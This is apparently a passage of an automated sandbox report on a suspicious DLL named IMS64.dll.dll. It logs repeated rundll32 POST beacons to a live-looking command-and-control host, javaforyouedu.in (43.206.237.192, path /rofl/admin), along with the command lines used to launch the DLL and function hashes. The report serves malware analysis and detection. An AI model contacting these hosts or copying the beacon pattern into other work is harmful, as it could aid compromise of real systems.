16	192.168.2.4	49753	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:39:47 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:39:47 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:39:47 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:39:47 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:39:47 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	43.206.237.192	443	7396	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:39:53 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:39:53 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:39:54 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:39:53 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:39:54 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	43.206.237.192	443	7372	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:39:53 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:39:53 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:39:54 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:39:54 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:39:54 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:40:01 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:40:01 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:40:01 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:40:01 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:40:01 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:40:20 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:40:20 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:40:20 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:40:20 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:40:20 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49759	43.206.237.192	443	7372	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:40:22 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:40:22 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:40:23 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:40:23 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:40:23 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	43.206.237.192	443	7396	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:40:22 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:40:22 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:40:23 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:40:23 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:40:23 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:40:46 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:40:46 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:40:47 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:40:47 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:40:47 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	43.206.237.192	443	7396	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:40:53 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:40:53 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:40:53 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:40:53 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:40:53 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	43.206.237.192	443	7372	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:40:53 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:40:53 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:40:53 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:40:53 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:40:53 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49763	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:41:08 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:41:08 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:41:08 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:41:08 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:41:08 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49765	43.206.237.192	443	7372	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:41:19 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:41:19 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:41:19 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:41:19 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:41:19 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49764	43.206.237.192	443	7396	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:41:19 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:41:19 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:41:19 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:41:19 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:41:19 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49766	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:41:33 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:41:33 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:41:33 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:41:33 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:41:33 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49767	43.206.237.192	443	7372	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:41:49 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:41:49 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:41:50 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:41:50 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:41:50 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49768	43.206.237.192	443	7396	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:41:49 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:41:49 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:41:50 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:41:50 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:41:50 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49769	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:42:00 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:42:00 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:42:01 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:42:00 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:42:01 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Target ID:	0
Start time:	07:37:54
Start date:	28/08/2024
Path:	C:\Windows\System32\loaddll64.exe
Wow64 process (32bit):	false
Commandline:	loaddll64.exe "C:\Users\user\Desktop\IMS64.dll.dll"
Imagebase:	0x7ff697fd0000
File size:	165'888 bytes
MD5 hash:	763455F9DCB24DFEECC2B9D9F8D46D52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:37:54
Start date:	28/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	07:37:54
Start date:	28/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1
Imagebase:	0x7ff749ee0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	07:37:54
Start date:	28/08/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\IMS64.dll.dll,main
Imagebase:	0x7ff73f1e0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	07:37:54
Start date:	28/08/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1
Imagebase:	0x7ff73f1e0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:37:57
Start date:	28/08/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",main
Imagebase:	0x7ff73f1e0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	14.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	83
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FFE133025E0 Relevance: 1.4, Strings: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XVd, xrefs: 00007FFE13302663

Memory Dump Source

Source File: 00000003.00000002.4122907159.00007FFE13301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000003.00000002.4122892367.00007FFE13300000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4122944958.00007FFE13342000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4122968321.00007FFE13347000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffe13300000_rundll32.jbxd

Similarity

API ID:
String ID: XVd
API String ID: 0-641440733
Opcode ID: 895eeefdb8f5bc7f452704ca4a7eee74cac299ba48fdf6b52e29c8c825f5dec9
Instruction ID: 0098dc31debc002578bf0be0e692fe7ab04edf9fcb86fe7f4044fbc7df7a3dd7
Opcode Fuzzy Hash: 895eeefdb8f5bc7f452704ca4a7eee74cac299ba48fdf6b52e29c8c825f5dec9
Instruction Fuzzy Hash: 3B51E622A08B8145EB20DB27B85576F6690FB957B4F008274EEBD57BE6DF3CD0409708

Function 000001CDED27CF0A Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 000001CDED27CF47

Memory Dump Source

Source File: 00000003.00000003.1688223900.000001CDED240000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CDED240000, based on PE: false

Joe Sandbox IDA Plugin

